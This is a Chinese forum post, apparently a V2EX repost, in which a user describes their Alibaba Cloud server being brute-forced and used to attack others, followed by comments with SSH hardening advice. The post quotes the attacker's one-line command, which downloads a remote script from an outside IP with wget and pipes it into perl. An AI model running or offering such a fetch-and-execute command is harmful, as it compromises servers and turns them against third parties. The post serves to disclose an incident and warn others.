阿里云被人暴力破解了

发布于

看了下最近登陆地是法国,那人用这个命令:

```bash
bash -c echo -e "\033[0m";echo -ne " \033[93m[\033[91m 1491/15819 \033[93m] \033[93m[\033[97m Executing cmd to \033[92m123.56.152.41:22 \033[93m] \033[96m ";wget -qO - 61.14.210.71/.j/sus3|perl
```

下载了一堆爆破工具包到我服务器上,然后用我服务器跑攻击脚本。现在服务器被阿里云判定为恶意攻击,暂时封禁了。

---

原文链接:[点击查看](https://www.v2ex.com/t/1227150)

评论(6)

附上攻击者控制我服务器时跑的脚本截图(图源 imgur)。

· 0 个赞

回复

楼主,你 SSH 是不是设的弱口令?我自己的阿里云图省事也开了外网 SSH,端口都没换,不过设的是强密码。用好几年了,天天看日志有人扫,但一直没出过事。

· 0 个赞

太正常了,现在公网上的服务器天天都有人拿脚本扫。建议直接把密码登录关了,只允许密钥认证。

· 0 个赞

楼主没用过 Cloudflare Tunnel 这类内网穿透工具吗?我一般都直接把 SSH 端口藏起来,根本不暴露在公网上。

· 0 个赞

其实早点遇到这种事也挺好,吃一堑长一智。不被搞一下,根本不知道那些繁琐的安全防护有多重要,也不会懂黑客渗透往往就是靠几个不起眼的小漏洞组合起来的。

· 0 个赞

看了半天,原来只是你买的云服务器被破了……我看标题还以为是阿里云官方面板被拿下了,吓我一跳。

· 0 个赞